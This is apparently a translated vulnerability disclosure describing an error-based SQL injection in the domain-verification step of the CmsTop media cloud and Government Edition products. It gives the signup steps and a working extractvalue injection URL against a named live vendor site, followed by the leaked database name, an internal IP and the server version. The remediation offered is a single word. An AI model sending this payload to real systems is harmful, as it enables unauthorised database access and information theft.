CMSTOP media cloud & amp; Government Edition SQL error Injection Vulnerability (XPATH)

CMSTOP media cloud & Government Edition SQL error Injection Vulnerability (XPATH)

RT

Manufacturer's official website: http://www.cmstop.com/

Products include:

The CmsTop media layout provides media with integrated new media technology solutions for "PC station + mobile phone terminal + tablet terminal" to facilitate media integration transformation. Media cloud CmsTop media cloud, as the pioneer in the media cloud era, is Revolutionizing Traditional software procurement and project outsourcing models and establishing strategic partnerships with media groups, based on Internet thinking and cloud computing technology, Alibaba Cloud integrates media and government affairs new media resources in the group, region, and industry to jointly build and operate media clouds. The CmsTop Government Affairs page of the government affairs edition provides the Party and government departments with a multi-terminal integrated website Group private cloud technology solution, helping the Party and government departments build a "two micro-ends" government affairs new media.

Online demonstration site:

http://www.cmstop.cn/

The SQL vulnerability lies in the domain name verification.

Step 1. Register

Step 2: Set the mobile phone number, QQ number, and other information

Step 3 and Step 4: Set a personalized Domain Name

In this step, filtering is missing, resulting in injection.

Submit'

Continue Construction

http://site.cmstop.cn/index/index/verfiysite?identifier=wooyunad' and extractvalue(1, concat(0x5c, (select database())));

 

Note out the database:

Database: cloud_data

Note users:
 

User: 10.162.64.228

And then the version...

Version: 5.6.16-log @ version_compile_ OS: Linux

Step 1. Register

Step 2. Log in after email Activation

Step 3: Set Information

Step 4: Set the Domain Name

Injection appears here

Solution:

Filter.